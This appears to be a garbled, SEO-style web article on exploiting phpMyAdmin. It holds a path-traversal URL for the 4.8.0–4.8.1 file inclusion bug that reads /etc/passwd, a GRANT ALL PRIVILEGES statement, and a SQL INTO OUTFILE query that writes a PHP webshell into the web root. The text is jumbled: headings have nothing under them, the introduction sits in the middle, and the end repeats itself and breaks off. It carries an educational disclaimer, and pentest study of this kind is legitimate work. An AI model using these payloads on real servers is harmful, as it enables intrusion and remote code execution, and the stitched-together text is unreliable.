Phpmyadmin Hacktricks May 2026

Once you have a shell via phpMyAdmin:

Cross-Site Request Forgery can modify the server’s configuration, leading to RCE.

Unauthenticated local file inclusion → RCE (phpMyAdmin 4.8.0 – 4.8.1)

Check it live:

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd

To get RCE:

phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server.

In the spirit of HackTricks (the legendary repository for pentesting tricks), this article compiles the most effective techniques to abuse, bypass, and exploit phpMyAdmin installations. phpmyadmin hacktricks

Disclaimer: This article is for educational purposes and authorized security testing only. Unauthorized access to databases is illegal.

Example:

GRANT ALL PRIVILEGES ON *.* TO 'user'@'%';

Write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

If you're defending against these tricks: Once you have a shell via phpMyAdmin: Cross-Site